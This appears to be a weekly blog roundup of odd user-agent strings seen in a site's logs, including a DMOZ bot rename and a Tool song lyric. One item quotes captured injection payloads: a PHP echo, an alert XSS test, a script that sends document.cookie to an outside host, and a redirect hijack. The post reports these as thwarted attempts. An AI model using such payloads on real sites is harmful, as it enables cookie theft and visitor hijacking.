• The DMOZ has a new user agent for it's Data Fountains bot - DataFountains/1.0. We had always seen DataFountains/DMOZ Downloader before. related...

• This was a big week for user agent script attacks / hijacks - we had 4 variations:
  1. One in PHP: <?php echo "B" ?>
  2. A simple javascript alert: <script>alert(1)</script>
  3. The famous Javascript document.write attempt: <script>document.write("<img src=\"http://members.lycos.nl/opslga4vshop/logje.php?id="+document.cookie+"/>");</script>
  4. And finally, a Javascript window.location hijack: <SCRIPT>window.location='http://www.syncrisis.com'</script>
  
  These technically may be viruses or malware on human browsers instead of malicious bots, but either way they are worth mention. This marks the 3rd distinct Syncrisis hijack attempt we have seen, and thwarted yet again. related...

• My personal favorite user agent of the week comes to us from the band "Tool" - does everyone remember the song "Schism"? Schism/1.8 (IknowThePiecesFit; CuzIwatchedThemFallAway). They even included enough lyrics in the user agent details to get the song stuck in your head. Clever! related...

• Marcus Walker gave himself a shoutout in our user agent logs by proclaming to be #1 in Business Networking. Yes, it's pretty pathetic, but it's creative at least. Who knows - maybe Marcus is a pioneer in User Agent advertising, and he'll get the last laugh once he's made a billion dollars. related...
